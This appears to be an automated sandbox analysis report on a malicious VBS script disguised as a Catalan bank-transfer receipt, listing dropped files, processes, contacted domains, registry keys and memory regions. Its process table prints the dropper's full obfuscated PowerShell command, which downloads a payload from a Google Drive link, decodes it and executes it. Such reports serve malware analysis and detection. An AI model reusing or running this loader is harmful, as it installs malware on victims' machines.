Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
justificant de transfer#U00e8ncia.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vnfwmx4.dha.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_550yl205.cft.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Colouration.Afh
|
HTML document, ASCII text, with very long lines (1692), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificant de transfer#U00e8ncia.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Skraaningsvinklen = 1;$Fotografiapparaternes202='Substrin';$Fotografiapparaternes202+='g';Function
Baroclinicity($Genforenende){$Piccoloerne=$Genforenende.Length-$Skraaningsvinklen;For($Vainness=5; $Vainness -lt $Piccoloerne;
$Vainness+=(6)){$Flyttende+=$Genforenende.$Fotografiapparaternes202.Invoke($Vainness, $Skraaningsvinklen);}$Flyttende;}function
parasols($Dugpunkts){. ($isskabes) ($Dugpunkts);}$Strandedness=Baroclinicity 'Age eMMicrooSyd,rzThermiToftmlS lenlMarp,a
Mak /Relev5Samov.Blood0 fte Thol( efolW TeltiD arfnAnk.nd BagsoCampiwG,debsOmnip Fo laNBrndsTGgele Stikh1 S,ud0frang. Kond0Thoke;,aptu
RumguWKoalii,arpenMongr6 Lu,s4 .nde;Sexua UnderxGejrp6Tou,n4 Midw;Dista MalmrVisitv,teto:Hykle1Dryad2 Hard1Cysto.Clupe0Prcis)
boga LaborGEneboeChenicBureak Clemo Gang/Flgev2Sm.at0Dsles1 nnih0 Ribn0oxli,1 T.ag0Etape1 Otm emulFDataliHastur BliteMiscofOverboSalgsx
ulph/ ,her1Decim2 Bero1A,ieh.Thras0Opstt ';$Budgetforslags=Baroclinicity 'VelseUBlurssBrnepeForlgrharmo-SaddeABefrugDeso,eSneglnQuatrtDilog
';$Programbibliotekerne=Baroclinicity 'InfamhBrygmt DisptFluespUlovmsTypeh: ,thi/Narco/Und rdRenour Hel,i skftv DetieFring.MaanegRverko
orkaoPrincg femvlBrazie ,rof. Pro,cFlertoC,burm K ge/SekunuTska.cSekre? kriteUnstaxForedp Vando SealrInd.at dspa= Ranud TykmoStru
w.lasknNa lsl HattoSu,ceaLibiddSmitt&HippoiVan hdAbsin=Infor1Ra koSH.ktiEb.lavG PruncDis iwK,lleB HanlcDeterOSpaliPTodiduIntr.C
Bldg6BefliM,tipu5Subscv aturD AlimjPrimukAnnekN HandXRagiuiHovedP DraczSvingaRetrtZPa,ktoConcezmega.dConsiUStowbePrsen2 NdriwRaen.
';$Noninductively=Baroclinicity 'Ubeh.>C.rap ';$isskabes=Baroclinicity ' osoniTagryeB lstxCha,l ';$Leisjes = Baroclinicity
'sejtreFristc ,olihEndo,oYemel Steff%Anti.aMinicpSpindpSluggdResida SuivtSoundaDagce%Burkg\HemagCTalrkoW mbwl.otheoOvergusmrgarbaadfa
Yamst nderiFoolsoAleu,n Call.Zool.AMerogfMapuchDonk, Belor&Welte&Uhlan EndeveTil.ucRustlhWebe.o Pred Post$Sagge ';parasols
(Baroclinicity 'Victu$Skrpeg FrivlInduso Omstbeks.ma NeollBe.kn:LevelP,evier,llano,ivisgUnregrThundaAlumim,agfjmCytoseSkinnrRetu.iChiconWe,trgLo
dosPreovm,sbryaH,ilkeEj rssEskilsColliiUnactgNedlu=Borto(Ud,mecRentemr,ckid Styr S,ati/georgc E.gy Overt$DispeLSweeteGesanihoneysAesirjFr,eseEqua,sSerr,)saliv
');parasols (Baroclinicity 'Engan$SpilugSordal .mmeoErhvebT appaDamp,l Part: ackhAD spivColumeF nden rettiTungnn B lr=Hachi$
Se uPErlggrLivero mpongRegiorTzotzaColismBenefbDvehjiOtolob BelclAlmeiiEk,troHylomt aadreFormokcentueInterr paanEulogeFavis.Rensks
HullpIdeallUreteipraestAssor(Sol r$MalefNOmregoThomanViftei .robnMejetdSjagguIncorcEndowtCideriSolcrv Oak.e,oarrlHu.boy Tax,)De,in
');$Programbibliotekerne=$Avenin[0];parasols (Baroclinicity ' F,rh$Ergong u.tyl Eth oBlomkbSubdaaOparbl,lind:str kpSt,ndh
PimpyCivillmun rlForgioSociam itniaCrocknAudi,cUne.cySquam=Pig oN koreeDra bwNarci- StowO UnspbBonitjYderpeSporec murktSwopc
SignaSCederyDisposCounttMargeeBattemEtage.SaareNDousee Pra,tTriqu.SixfoWTopfoe Tim bRe maCSideblprelei BlgeeOverfnTek,ttRigsa
');parasols (Baroclinicity 'fremm$ GeggpDememh orhaysmertlT,maclIsthmoM,metmRetroaVan,tnMo gecAngolyTel,g.Cap,cH Na seBarbaaJuveld
FdereSkkelrRaabesVcrum[Preva$CategB SelvuLymphdGigabgHex.deArnolt FootfSorehoKoki,r BactsBodyblJord aHypergBos isGast.]Raens=Aflaa$ZafreSMrkvrt
Can rcolesaAlmennRe ndd AbsceCistodtykpan SemieAntipsN veasUdspr ');$Damasker=Baroclinicity 'Fe ogpProcahR tteyvesiclschatlJegrooDi
cimAcousa SpinnGaeldcSinciySkede.reg,nD.lefaoEfterwabrogn TegllSigbroIrrecaunviadTr.feFAt.niiOverclToaareMo,nw(Kontr$Sejr
PIndk,rRll.koJayvegInsi.rGrundaWhatrmBytt,b HypoiGad.nb KondlSlangiPatacoBugspt D oseGennekBlnd.eAr her HispnForkaeDatak,Croft$Ne.ghS
EkspnAvlsseBogbidAulopsUng.n)Nudit ';$Damasker=$Programmeringsmaessig[1]+$Damasker;$Sneds=$Programmeringsmaessig[0];parasols
(Baroclinicity 'overm$K.selgJamb.lFormaoIhndebikrafa,eriel,till: Hin,B,boniiTaleslExchal Erhvi Oxygg BlgegMa,icrAdopte Diakl
KonssRo lyeHyposrMiszo= Net (ForhaT luste Tubus implt Ha,d- SldePForhraFigurtMinibhAmam Fde.a$ HjlaSPaahonFundgeF,rfad DetasForkl).lgod
');while (!$Billiggrelser) {parasols (Baroclinicity 'S.eve$OplivgBudsnlSp aeoBrsnobbou oaSespelPlebe:A,eliTVatikuStiltsskildimaternSpiridDigtesHldnitAnissr
Fa iaElskoaUnshrlCorroe Nvn.rquake= Beau$ lapptHistirFr ueuRyg reforpl ') ;parasols $Damasker;parasols (Baroclinicity 'Bog.oSPrototRorpiaInquirP,otetEfte,-CykelS
.irclKobbeeAlle,eOmklap,remm ,rav4Ekspe ');parasols (Baroclinicity 'Rrfla$EftergDolomlKerauoA.milbProphaAarvalstryg:BisatBAr.ibiCate.lHeinel
AntriVgtstg Ka agAutocrReexpeEquallPhotosDelebeEt.oxr Maks= Admi(Udf.dTReinseIgnavs BrndtStofm- fyrsP Nvnea Mar,tAux.lh Jo
u kano$Chal,SFleksnInst eFordedTavolsUnrel)Kemof ') ;parasols (Baroclinicity 'Twist$ArbejgThe ilGarago UndebEvideaBesl.lBe,je:NonseS
OrdstUb fre Mosenstoleo LrligKopmarM,rcuaOplsnmCroucm,ladseSt.kkt Scols U ca=Perip$ nticg mporlBiplaoByfesbHvnedaLretilIldeb:MachaSB
asfuFo,anbSmaa.f schraTankelKokkecLudediCalamf,kkomoEl smrstan.mswart+Becke+Skraa%Famle$BrandA,eriavSpodee dfon NybeiKumpanKolog.
GospcGoldeo,rammuSymm,nDataltSvejs ') ;$Programbibliotekerne=$Avenin[$Stenogrammets];}parasols (Baroclinicity ' .lin$Tempog
RecalLiquiozoos,bAlteraNdsitlOve v:FilmoLL vkeaAfdrynOpkald tormsAsturbPyknoyFlagep.elvsrShadosSvvebtNiskeeNovaenMacaw Wair,=Udvis
ga.kGNest eUparrtskoma-Hu meCMadpaoskjornFlekstDietie OptonMetrotDilet Besin$ UnreSCentrnCultueLiflidPat.isUbevi ');parasols
(Baroclinicity 'Armek$basgugUdlanlTrr.loCytosbsabataRvejalProce:Ou prOKandivUdlane UnferKil.nmforlnaAftrdrTrsnikUsm nilindbnMiswrg
Ern. Wheat=Ham.e Benni[ WorkSDetaiy BovrsMicrot GyneePrecam ,rat.PrestCHemipoStrannRb,rtvRdby.e DimyrDegust .onh]Bindi:Bedre:DeraiFGrupprTerreoUnisemudbomBla.tvaForbrsSupereBygni6.piso4UnepiS
Ahant DenarSubcliDisinnAfbetg Para(Vak,u$ L tuLManagaSqui nHje md h,resBurleb ansoyYdemepDiskorSl,ansPeltit DemoeF.nesn Hule)Anemo
');parasols (Baroclinicity '.onoc$BidiagLforblBlartounp ibMell abuslilI dek:WhiffAElectnUd.ybtSkkephamidoo Acrom .vote FonedFer
euGloris GifoaU ntae ack ,lsk= Udlb Elsk[.alkeSGemmey TallsB somt Strae Fll mIntra. afbrTSkrfeeCiconxA trataffyr.Keel EVan
gnDelficPlatoo Uvild Svumi nfln Karlg d.ma]Dreje:Smile:Femi,ASleavS Mil,CBundlIStbegIUvorn. BiasGFagoteNorditP,enoSTolertUnwarr
AppoiLoudenSelbog.uniw(Clar $Perm.OKr blv M lieSka,orOphvemBourtaHgte,r .eilkOutediCenten PuyagSu.pm) Reco ');parasols (Baroclinicity
' Morp$byg egPaiwalTankeoMetenb ContaDribllDhunc:ProtoBS,nkieAdminkOmflylTanklecivi mPredemGenbre UdkanHjlped Po,yeWa,er=Nudat$GrafiA
Projn Philt GutthK.sseoochermTak ne .emrd LoweuFestfs SlaaaL.ttee N.nm. Ar,isSpilduSpecibDrusesGkanttTrykarTomatiInclin revpgHaggy(Gooie2Slags8Indgi4
noha4Hawke5Fortr3Kaoli,Brams2guara8Milit9Masti4U,der5 .amm)fde a ');parasols $Beklemmende;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Colouration.Afh && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://crl.v
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
There are 10 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
drive.google.com
|
142.250.105.102
|
||
|
drive.usercontent.google.com
|
142.250.105.132
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
142.250.105.102
|
drive.google.com
|
United States
|
||
|
142.250.105.132
|
drive.usercontent.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
231778B6000
|
heap
|
page read and write
|
||
|
23177C83000
|
heap
|
page read and write
|
||
|
89CAC7F000
|
stack
|
page read and write
|
||
|
7FFAAC480000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC340000
|
trusted library allocation
|
page execute and read and write
|
||
|
231779D2000
|
heap
|
page read and write
|
||
|
2457E4B1000
|
heap
|
page read and write
|
||
|
245187E5000
|
heap
|
page read and write
|
||
|
2317786C000
|
heap
|
page read and write
|
||
|
23177AA6000
|
heap
|
page read and write
|
||
|
23177A79000
|
heap
|
page read and write
|
||
|
23177A33000
|
heap
|
page read and write
|
||
|
231779EA000
|
heap
|
page read and write
|
||
|
2317795E000
|
heap
|
page read and write
|
||
|
23177A87000
|
heap
|
page read and write
|
||
|
7FFAAC2DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
231778CA000
|
heap
|
page read and write
|
||
|
23177C63000
|
heap
|
page read and write
|
||
|
23177D21000
|
heap
|
page read and write
|
||
|
24500050000
|
heap
|
page readonly
|
||
|
7FFAAC4B0000
|
trusted library allocation
|
page read and write
|
||
|
89CACFE000
|
stack
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
23175A70000
|
heap
|
page read and write
|
||
|
16859230000
|
heap
|
page read and write
|
||
|
23177903000
|
heap
|
page read and write
|
||
|
89CBECE000
|
stack
|
page read and write
|
||
|
7FFAAC440000
|
trusted library allocation
|
page read and write
|
||
|
16859210000
|
heap
|
page read and write
|
||
|
231778EE000
|
heap
|
page read and write
|
||
|
23177CC9000
|
heap
|
page read and write
|
||
|
23175C07000
|
heap
|
page read and write
|
||
|
23177BBA000
|
heap
|
page read and write
|
||
|
23175DF0000
|
heap
|
page read and write
|
||
|
23175C15000
|
heap
|
page read and write
|
||
|
231779D2000
|
heap
|
page read and write
|
||
|
89CAD7E000
|
stack
|
page read and write
|
||
|
23175B96000
|
heap
|
page read and write
|
||
|
7FFB16791000
|
unkown
|
page execute read
|
||
|
23177A01000
|
heap
|
page read and write
|
||
|
7FFB167A6000
|
unkown
|
page readonly
|
||
|
7FFAAC3D1000
|
trusted library allocation
|
page read and write
|
||
|
24500250000
|
heap
|
page execute and read and write
|
||
|
23177A71000
|
heap
|
page read and write
|
||
|
23177942000
|
heap
|
page read and write
|
||
|
16859544000
|
heap
|
page read and write
|
||
|
23177CB6000
|
heap
|
page read and write
|
||
|
231778F6000
|
heap
|
page read and write
|
||
|
23177C91000
|
heap
|
page read and write
|
||
|
23177A01000
|
heap
|
page read and write
|
||
|
245186D5000
|
heap
|
page read and write
|
||
|
231779CE000
|
heap
|
page read and write
|
||
|
7FFAAC560000
|
trusted library allocation
|
page read and write
|
||
|
2451873A000
|
heap
|
page read and write
|
||
|
7FFB167B0000
|
unkown
|
page read and write
|
||
|
231778EB000
|
heap
|
page read and write
|
||
|
16859310000
|
heap
|
page read and write
|
||
|
89CB2FE000
|
stack
|
page read and write
|
||
|
7FFAAC3C0000
|
trusted library allocation
|
page read and write
|
||
|
2317788A000
|
heap
|
page read and write
|
||
|
7FFAAC430000
|
trusted library allocation
|
page read and write
|
||
|
23175DFB000
|
heap
|
page read and write
|
||
|
23177861000
|
heap
|
page read and write
|
||
|
23177A56000
|
heap
|
page read and write
|
||
|
7FFAAC4C0000
|
trusted library allocation
|
page read and write
|
||
|
23177CA5000
|
heap
|
page read and write
|
||
|
89CADFE000
|
stack
|
page read and write
|
||
|
23177927000
|
heap
|
page read and write
|
||
|
23177932000
|
heap
|
page read and write
|
||
|
89CB1F7000
|
stack
|
page read and write
|
||
|
23177CA1000
|
heap
|
page read and write
|
||
|
24500750000
|
trusted library allocation
|
page read and write
|
||
|
231779B6000
|
heap
|
page read and write
|
||
|
24502356000
|
trusted library allocation
|
page read and write
|
||
|
2457E456000
|
heap
|
page read and write
|
||
|
23177A61000
|
heap
|
page read and write
|
||
|
23175B89000
|
heap
|
page read and write
|
||
|
CFA72FB000
|
stack
|
page read and write
|
||
|
2317792F000
|
heap
|
page read and write
|
||
|
23177A14000
|
heap
|
page read and write
|
||
|
24502124000
|
trusted library allocation
|
page read and write
|
||
|
23177A12000
|
heap
|
page read and write
|
||
|
23177AB9000
|
heap
|
page read and write
|
||
|
23177CDD000
|
heap
|
page read and write
|
||
|
231779CE000
|
heap
|
page read and write
|
||
|
23177894000
|
heap
|
page read and write
|
||
|
231778A1000
|
heap
|
page read and write
|
||
|
89CAFFE000
|
stack
|
page read and write
|
||
|
2317792A000
|
heap
|
page read and write
|
||
|
24518926000
|
heap
|
page read and write
|
||
|
2457E43A000
|
heap
|
page read and write
|
||
|
7FFAAC23B000
|
trusted library allocation
|
page read and write
|
||
|
2457E4F0000
|
heap
|
page read and write
|
||
|
23177A7A000
|
heap
|
page read and write
|
||
|
231778D5000
|
heap
|
page read and write
|
||
|
23177CF5000
|
heap
|
page read and write
|
||
|
231779D2000
|
heap
|
page read and write
|
||
|
23177A07000
|
heap
|
page read and write
|
||
|
7FFAAC220000
|
trusted library allocation
|
page read and write
|
||
|
23177CA0000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
||
|
23177AA6000
|
heap
|
page read and write
|
||
|
7FFAAC4A0000
|
trusted library allocation
|
page read and write
|
||
|
23177881000
|
heap
|
page read and write
|
||
|
CFA71FE000
|
stack
|
page read and write
|
||
|
23177D70000
|
heap
|
page read and write
|
||
|
2317793F000
|
heap
|
page read and write
|
||
|
23177DDF000
|
heap
|
page read and write
|
||
|
2317795E000
|
heap
|
page read and write
|
||
|
245021A6000
|
trusted library allocation
|
page read and write
|
||
|
23177AB9000
|
heap
|
page read and write
|
||
|
23177CE8000
|
heap
|
page read and write
|
||
|
24502038000
|
trusted library allocation
|
page read and write
|
||
|
24518660000
|
heap
|
page execute and read and write
|
||
|
24518670000
|
heap
|
page read and write
|
||
|
23177A19000
|
heap
|
page read and write
|
||
|
231778E2000
|
heap
|
page read and write
|
||
|
2451026F000
|
trusted library allocation
|
page read and write
|
||
|
2451873D000
|
heap
|
page read and write
|
||
|
7FFAAC590000
|
trusted library allocation
|
page read and write
|
||
|
23177957000
|
heap
|
page read and write
|
||
|
23177D44000
|
heap
|
page read and write
|
||
|
2317790E000
|
heap
|
page read and write
|
||
|
23177A70000
|
heap
|
page read and write
|
||
|
245187C0000
|
heap
|
page read and write
|
||
|
23177A07000
|
heap
|
page read and write
|
||
|
23177BBA000
|
heap
|
page read and write
|
||
|
24500754000
|
trusted library allocation
|
page read and write
|
||
|
231779F0000
|
heap
|
page read and write
|
||
|
89CB0F7000
|
stack
|
page read and write
|
||
|
23177AAE000
|
heap
|
page read and write
|
||
|
7FFAAC2D0000
|
trusted library allocation
|
page read and write
|
||
|
24501B0E000
|
trusted library allocation
|
page read and write
|
||
|
23175B8F000
|
heap
|
page read and write
|
||
|
231778D2000
|
heap
|
page read and write
|
||
|
23177CAF000
|
heap
|
page read and write
|
||
|
23177CE8000
|
heap
|
page read and write
|
||
|
7FFAAC500000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page read and write
|
||
|
23177892000
|
heap
|
page read and write
|
||
|
2317788D000
|
heap
|
page read and write
|
||
|
23177990000
|
heap
|
page read and write
|
||
|
7FFB167B5000
|
unkown
|
page readonly
|
||
|
16859545000
|
heap
|
page read and write
|
||
|
2317791B000
|
heap
|
page read and write
|
||
|
2457E41D000
|
heap
|
page read and write
|
||
|
23175C24000
|
heap
|
page read and write
|
||
|
23177A07000
|
heap
|
page read and write
|
||
|
23177500000
|
remote allocation
|
page read and write
|
||
|
2457E390000
|
heap
|
page read and write
|
||
|
245187E1000
|
heap
|
page read and write
|
||
|
2457FDE5000
|
heap
|
page read and write
|
||
|
CFA68FA000
|
stack
|
page read and write
|
||
|
7FFAAC4D0000
|
trusted library allocation
|
page read and write
|
||
|
23177A97000
|
heap
|
page read and write
|
||
|
CFA6EFB000
|
stack
|
page read and write
|
||
|
1685931A000
|
heap
|
page read and write
|
||
|
23177894000
|
heap
|
page read and write
|
||
|
23177A56000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
||
|
23177E80000
|
heap
|
page read and write
|
||
|
23175C07000
|
heap
|
page read and write
|
||
|
23177A7D000
|
heap
|
page read and write
|
||
|
23177913000
|
heap
|
page read and write
|
||
|
7FFAAC570000
|
trusted library allocation
|
page read and write
|
||
|
23177A07000
|
heap
|
page read and write
|
||
|
23175DF9000
|
heap
|
page read and write
|
||
|
7FFAAC27C000
|
trusted library allocation
|
page execute and read and write
|
||
|
23177A75000
|
heap
|
page read and write
|
||
|
23177500000
|
remote allocation
|
page read and write
|
||
|
2317793A000
|
heap
|
page read and write
|
||
|
231779B6000
|
heap
|
page read and write
|
||
|
23177A96000
|
heap
|
page read and write
|
||
|
245020AA000
|
trusted library allocation
|
page read and write
|
||
|
23177881000
|
heap
|
page read and write
|
||
|
24500712000
|
trusted library allocation
|
page read and write
|
||
|
89CB078000
|
stack
|
page read and write
|
||
|
23177871000
|
heap
|
page read and write
|
||
|
231778B9000
|
heap
|
page read and write
|
||
|
1360F5D000
|
stack
|
page read and write
|
||
|
7FFAAC22D000
|
trusted library allocation
|
page execute and read and write
|
||
|
CFA6CFF000
|
stack
|
page read and write
|
||
|
23175B8C000
|
heap
|
page read and write
|
||
|
23177869000
|
heap
|
page read and write
|
||
|
23177AA1000
|
heap
|
page read and write
|
||
|
23177CBE000
|
heap
|
page read and write
|
||
|
24500040000
|
trusted library allocation
|
page read and write
|
||
|
2457E43E000
|
heap
|
page read and write
|
||
|
23175B8B000
|
heap
|
page read and write
|
||
|
23177952000
|
heap
|
page read and write
|
||
|
23175C24000
|
heap
|
page read and write
|
||
|
23177ABB000
|
heap
|
page read and write
|
||
|
7FFAAC3DA000
|
trusted library allocation
|
page read and write
|
||
|
23175B67000
|
heap
|
page read and write
|
||
|
23177CB6000
|
heap
|
page read and write
|
||
|
89CB37E000
|
stack
|
page read and write
|
||
|
89CBF4D000
|
stack
|
page read and write
|
||
|
23177CC7000
|
heap
|
page read and write
|
||
|
24500080000
|
heap
|
page read and write
|
||
|
CFA6FFC000
|
stack
|
page read and write
|
||
|
89CAE7D000
|
stack
|
page read and write
|
||
|
23177860000
|
heap
|
page read and write
|
||
|
245006EC000
|
trusted library allocation
|
page read and write
|
||
|
24510271000
|
trusted library allocation
|
page read and write
|
||
|
2451871C000
|
heap
|
page read and write
|
||
|
23177874000
|
heap
|
page read and write
|
||
|
23177861000
|
heap
|
page read and write
|
||
|
24510415000
|
trusted library allocation
|
page read and write
|
||
|
23177CBE000
|
heap
|
page read and write
|
||
|
23177894000
|
heap
|
page read and write
|
||
|
23177A80000
|
heap
|
page read and write
|
||
|
23175DF5000
|
heap
|
page read and write
|
||
|
7FFB167B2000
|
unkown
|
page readonly
|
||
|
24518667000
|
heap
|
page execute and read and write
|
||
|
231779D2000
|
heap
|
page read and write
|
||
|
23177A60000
|
heap
|
page read and write
|
||
|
23177A01000
|
heap
|
page read and write
|
||
|
24501B1E000
|
trusted library allocation
|
page read and write
|
||
|
23177AD3000
|
heap
|
page read and write
|
||
|
23177CE8000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
||
|
23177CB6000
|
heap
|
page read and write
|
||
|
2451891C000
|
heap
|
page read and write
|
||
|
23177CBE000
|
heap
|
page read and write
|
||
|
24502015000
|
trusted library allocation
|
page read and write
|
||
|
245006D0000
|
trusted library allocation
|
page read and write
|
||
|
23177510000
|
heap
|
page read and write
|
||
|
23177A86000
|
heap
|
page read and write
|
||
|
23177DD9000
|
heap
|
page read and write
|
||
|
23177885000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
||
|
23177A78000
|
heap
|
page read and write
|
||
|
23177CBE000
|
heap
|
page read and write
|
||
|
23177916000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
||
|
2457E480000
|
heap
|
page read and write
|
||
|
13612FF000
|
unkown
|
page read and write
|
||
|
23177906000
|
heap
|
page read and write
|
||
|
7FFAAC4E0000
|
trusted library allocation
|
page read and write
|
||
|
23177CAE000
|
heap
|
page read and write
|
||
|
24500ADA000
|
trusted library allocation
|
page read and write
|
||
|
23177CDA000
|
heap
|
page read and write
|
||
|
23177895000
|
heap
|
page read and write
|
||
|
245102D3000
|
trusted library allocation
|
page read and write
|
||
|
23177CDD000
|
heap
|
page read and write
|
||
|
23175DF8000
|
heap
|
page read and write
|
||
|
23177937000
|
heap
|
page read and write
|
||
|
CFA6AFE000
|
stack
|
page read and write
|
||
|
231779F1000
|
heap
|
page read and write
|
||
|
24518751000
|
heap
|
page read and write
|
||
|
24502019000
|
trusted library allocation
|
page read and write
|
||
|
23175C35000
|
heap
|
page read and write
|
||
|
23177BBA000
|
heap
|
page read and write
|
||
|
23175DFB000
|
heap
|
page read and write
|
||
|
23177A88000
|
heap
|
page read and write
|
||
|
24518780000
|
heap
|
page execute and read and write
|
||
|
23177888000
|
heap
|
page read and write
|
||
|
23177A6D000
|
heap
|
page read and write
|
||
|
24502053000
|
trusted library allocation
|
page read and write
|
||
|
89CB3FF000
|
stack
|
page read and write
|
||
|
23175DFE000
|
heap
|
page read and write
|
||
|
2317794A000
|
heap
|
page read and write
|
||
|
CFA6DFE000
|
stack
|
page read and write
|
||
|
231779ED000
|
heap
|
page read and write
|
||
|
89CB47B000
|
stack
|
page read and write
|
||
|
23177BBA000
|
heap
|
page read and write
|
||
|
7FFAAC550000
|
trusted library allocation
|
page read and write
|
||
|
23175C18000
|
heap
|
page read and write
|
||
|
2451055C000
|
trusted library allocation
|
page read and write
|
||
|
16859410000
|
heap
|
page read and write
|
||
|
7FFAAC580000
|
trusted library allocation
|
page read and write
|
||
|
89CAF7E000
|
stack
|
page read and write
|
||
|
23177A61000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
||
|
231778A6000
|
heap
|
page read and write
|
||
|
23177894000
|
heap
|
page read and write
|
||
|
23177A61000
|
heap
|
page read and write
|
||
|
7FFAAC5A0000
|
trusted library allocation
|
page read and write
|
||
|
23177CD6000
|
heap
|
page read and write
|
||
|
23177866000
|
heap
|
page read and write
|
||
|
23177CD3000
|
heap
|
page read and write
|
||
|
2317796F000
|
heap
|
page read and write
|
||
|
2317795E000
|
heap
|
page read and write
|
||
|
24518932000
|
heap
|
page read and write
|
||
|
89CB178000
|
stack
|
page read and write
|
||
|
23177F22000
|
heap
|
page read and write
|
||
|
23177A6D000
|
heap
|
page read and write
|
||
|
2317795A000
|
heap
|
page read and write
|
||
|
7FFAAC420000
|
trusted library allocation
|
page read and write
|
||
|
2450202D000
|
trusted library allocation
|
page read and write
|
||
|
24502040000
|
trusted library allocation
|
page read and write
|
||
|
23177870000
|
heap
|
page read and write
|
||
|
2457E590000
|
heap
|
page read and write
|
||
|
2457E47E000
|
heap
|
page read and write
|
||
|
24501543000
|
trusted library allocation
|
page read and write
|
||
|
23177A7A000
|
heap
|
page read and write
|
||
|
245006E4000
|
trusted library allocation
|
page read and write
|
||
|
2317789D000
|
heap
|
page read and write
|
||
|
231778CD000
|
heap
|
page read and write
|
||
|
2457E2B0000
|
heap
|
page read and write
|
||
|
2317796F000
|
heap
|
page read and write
|
||
|
23177AA9000
|
heap
|
page read and write
|
||
|
23175B8E000
|
heap
|
page read and write
|
||
|
23177C8E000
|
heap
|
page read and write
|
||
|
23177ADE000
|
heap
|
page read and write
|
